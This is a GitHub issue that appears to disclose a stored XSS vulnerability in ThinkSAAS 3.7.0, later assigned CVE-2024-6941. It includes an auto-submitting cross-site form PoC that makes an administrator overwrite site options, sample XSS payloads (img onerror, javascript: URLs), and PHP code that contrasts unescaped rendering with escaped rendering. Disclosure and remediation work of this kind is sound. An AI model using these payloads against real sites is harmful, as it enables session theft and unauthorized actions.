Hebing123 / cve


ThinkSAAS 3.7.0 has a stored XSS vulnerability #58

Open Hebing123 opened 1 month ago

Hebing123 commented 1 month ago

Summary

The ThinkSAAS 3.7.0 application contains a stored XSS vulnerability caused by insufficient sanitization of user input. Specifically, the parameters site_title, site_subtitle, site_key, site_desc, site_url, site_email, and site_icp are not properly filtered for malicious code in app/system/action/do.php. An attacker can exploit this issue by injecting malicious payloads into these parameters, leading to the execution of arbitrary JavaScript code in the context of the user's browser.

Details

In this case, none of the string-type variables are properly escaped, making them vulnerable to stored XSS attacks [screenshot]. For example, if we modify the site_title, then: [screenshots]

POC

The following example demonstrates how an attacker can exploit the vulnerability by injecting a payload into the site_title parameter: An attacker places the PoC on their own website. When the administrator opens this webpage, they unknowingly modify the site_url of their own website. Since the site_url variable is used in header.html, almost any page on the website can trigger the stored XSS vulnerability.

<html>
  <body>
    <form action="http://your-ip/index.php?app=system&ac=options&ts=do" method="POST">
      <input type="hidden" name="option[site_title]" value="&quot;&gt;hklei&#47;&#47;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

All pages that utilize the affected parameters (site_title, site_subtitle, site_icp, etc.) will be vulnerable to the XSS exploit. This can lead to unauthorized actions being taken on behalf of authenticated users, theft of session cookies, and other malicious activities.
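
The following is an added example and not ThinkSAAS code: it renders the affected options into the two HTML contexts a header template typically uses (element text, an attribute value, and an href), first the way a template that echoes options verbatim behaves, then with context-appropriate escaping applied at output time. The template markup and the sample values are constructed for the example; the option names and the `">hklei//` breakout marker come from the report above.

```php
<?php
declare(strict_types=1);

// Constructed sample values, in the shape an attacker could store through the
// options form. The first is the attribute-breakout marker from the PoC; the
// others show why the other two contexts need their own handling.
const SAMPLE_OPTIONS = [
    'site_title' => '">hklei//',
    'site_desc'  => '"><img src=x onerror=alert(document.domain)>',
    'site_url'   => 'javascript:alert(1)//',
];

// Vulnerable rendering: options interpolated verbatim into the template, which
// is the behaviour the report describes for header.html (assumed markup).
function render_header_unescaped(array $o): string
{
    return '<title>' . $o['site_title'] . '</title>' . "\n"
         . '<meta name="description" content="' . $o['site_desc'] . '">' . "\n"
         . '<a href="' . $o['site_url'] . '">home</a>';
}

// Escape for HTML text and attribute contexts. ENT_QUOTES covers both quote
// styles, so a stored value can no longer close the attribute it sits in.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// site_url lands in an href, where escaping alone is not enough: a javascript:
// scheme survives htmlspecialchars untouched and runs on click. Allow only
// http(s) and fall back to a harmless relative link otherwise.
function safe_url(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : '/';
}

// Hardened rendering: same markup, every option escaped for its context.
function render_header_escaped(array $o): string
{
    return '<title>' . e($o['site_title']) . '</title>' . "\n"
         . '<meta name="description" content="' . e($o['site_desc']) . '">' . "\n"
         . '<a href="' . e(safe_url($o['site_url'])) . '">home</a>';
}

// Lists the opening tag names in rendered output. The template itself only
// contributes title, meta and a; anything else came from a stored option.
function tag_names(string $html): array
{
    preg_match_all('/<([a-zA-Z][a-zA-Z0-9]*)/', $html, $m);
    return array_map('strtolower', $m[1]);
}

$vuln = render_header_unescaped(SAMPLE_OPTIONS);
$safe = render_header_escaped(SAMPLE_OPTIONS);

echo "--- unescaped ---\n", $vuln, "\n";
echo "tags: ", implode(', ', tag_names($vuln)), "\n\n";   // title, meta, img, a
echo "--- escaped ---\n", $safe, "\n";
echo "tags: ", implode(', ', tag_names($safe)), "\n";     // title, meta, a
```

Run with `php example.php`. The unescaped output contains an injected img tag and a clickable javascript: link; the escaped output reproduces the stored strings as visible text and neutralises the URL. Escaping belongs at the output point in the template rather than only in do.php, because the same option is reused on every page that includes the header, and the input-side filter the report asks for would have to anticipate every context the value is later rendered into.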

Hebing123 commented 1 month ago

CVE-2024-6941